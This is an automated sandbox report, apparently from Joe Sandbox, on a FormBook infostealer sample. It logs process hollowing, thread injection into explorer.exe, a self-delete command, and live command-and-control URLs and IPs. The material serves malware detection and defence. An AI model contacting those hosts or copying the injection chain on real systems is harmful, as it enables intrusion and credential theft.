Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]	9_2_04762581
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]	9_2_04762581
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]	9_2_04762581
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]	9_2_04762581
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]	9_2_04732D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]	9_2_04732D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]	9_2_04732D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]	9_2_04732D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]	9_2_04732D8A
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]	9_2_0475AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]	9_2_0475AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]	9_2_0475AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]	9_2_0475AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]	9_2_0475AE73
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0474766D mov eax, dword ptr fs:[00000030h]	9_2_0474766D
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]	9_2_04800EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]	9_2_04800EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]	9_2_04800EA5
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04747E41 mov eax, dword ptr fs:[00000030h]	9_2_04747E41
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]	9_2_047FAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047FAE44 mov eax, dword ptr fs:[00000030h]	9_2_047FAE44
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047EFE3F mov eax, dword ptr fs:[00000030h]	9_2_047EFE3F
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473E620 mov eax, dword ptr fs:[00000030h]	9_2_0473E620
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04808ED6 mov eax, dword ptr fs:[00000030h]	9_2_04808ED6
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]	9_2_0476A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0476A61C mov eax, dword ptr fs:[00000030h]	9_2_0476A61C
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]	9_2_0473C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]	9_2_0473C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_0473C600 mov eax, dword ptr fs:[00000030h]	9_2_0473C600
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_04768E00 mov eax, dword ptr fs:[00000030h]	9_2_04768E00
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047F1608 mov eax, dword ptr fs:[00000030h]	9_2_047F1608
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047616E0 mov ecx, dword ptr fs:[00000030h]	9_2_047616E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 9_2_047476E2 mov eax, dword ptr fs:[00000030h]	9_2_047476E2

Source: C:\Users\user\Desktop\2435.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.shitarpa.net
Source: C:\Windows\explorer.exe	Domain query: www.northsytyle.com
Source: C:\Windows\explorer.exe	Network Connect: 199.59.242.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 170.39.76.111 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.houseofsisson.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\2435.exe	Section loaded: unknown target: C:\Users\user\Desktop\2435.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\2435.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\2435.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\2435.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\2435.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\2435.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\2435.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: 340000

Jump to behavior

Source: C:\Users\user\Desktop\2435.exe	Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.252916263.00000000089FF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.237275361.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.237538819.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\2435.exe

Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405B88

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection512	Rootkit1	Credential API Hooking1	Security Software Discovery131	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing11	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2435.exe	43%	ReversingLabs	Win32.Backdoor.Mokes
2435.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.1.2435.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.2435.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.2435.exe.24d0000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.control.exe.4d7f834.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.control.exe.43b090.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.2435.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
0.2.2435.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File
1.0.2435.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1137482	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e	0%	Avira URL Cloud	safe
http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
www.knighttechinca.com/dxe/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.northsytyle.com	199.59.242.153	true	true	unknown
houseofsisson.com	170.39.76.111	true	true	unknown
shitarpa.net	34.102.136.180	true	false	unknown
www.shitarpa.net	unknown	unknown	true	unknown
www.houseofsisson.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.shitarpa.net/dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e	false	Avira URL Cloud: safe	unknown
http://www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W	true	Avira URL Cloud: safe	unknown
http://www.houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT	true	Avira URL Cloud: safe	unknown
www.knighttechinca.com/dxe/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	2435.exe	false		high
http://www.goodfont.co.kr	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI	control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_Error	2435.exe	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
199.59.242.153	www.northsytyle.com	United States	395082	BODIS-NJUS	true
34.102.136.180	shitarpa.net	United States	15169	GOOGLEUS	false
170.39.76.111	houseofsisson.com	Reserved	139776	PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433173
Start date:	11.06.2021
Start time:	12:11:53
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2435.bat (renamed file extension from bat to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/4@3/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 23.8% (good quality ratio 22%) Quality average: 76.3% Quality standard deviation: 29.9%
HCA Information:	Successful, ratio: 89% Number of executed functions: 101 Number of non-executed functions: 199
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 13.64.90.137, 93.184.220.29, 92.122.145.220, 13.88.21.125, 52.147.198.201, 184.30.20.56, 20.50.102.62, 92.122.213.247, 92.122.213.194, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information VT rate limit hit for: /opt/package/joesandbox/database/analysis/433173/sample/2435.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
199.59.242.153	] New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
	fD56g4DRzG.exe	Get hash	malicious	Browse	www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
	malware300.docm	Get hash	malicious	Browse	ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
	Payment.exe	Get hash	malicious	Browse	www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp
	PROFORMA INVOICE PDF.exe	Get hash	malicious	Browse	www.chrispricellc.com/owws/?y8z=/Zb3FoJdV7HG6COtxpXcx+uQ7VrNir73csK26ufEZgOwDpn6qCuxbbRH6zNTHuB4YMFv&UDKPKv=04i8JpzhsHVX
	Order.exe	Get hash	malicious	Browse	www.sweeneysservicecenter.com/jogt/?w6ATB0=U2LhZ94w5IDC+2DErQbRlpD/OzsCIaT6lUf8FwZRqb7l7kFTMUkxaoKrt4WuZdpJEkCM&Jxox=Er6tXhMxl
	INQ-741-020621-PDF.exe	Get hash	malicious	Browse	www.hairgrowinggenius.com/pb93/?a0GLMhc=KPEvW4YRciSJiJFFNYizsATDgsgPxpmwnLISCA8VBLwfqs8m2gzQMN5Q9cE7knzB0ifR&rTqL5=0DKH1VwxRB
	CONTAINER DEPOSIT.exe	Get hash	malicious	Browse	www.northsytyle.com/dxe/?nPRT_Pn=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W&k6Ad3=_vc0KnhxhJu
	Swift copy_9808.exe	Get hash	malicious	Browse	www.scientiagenus.com/p6nu/?C2JdTP=eE7I+Sv8iOFRLyMlwLdgwXijBECgGV3UTircOP7TdIwQdQ324QcldvmuNHuZw5leTbqh&z6nHM=ITnT9Fg
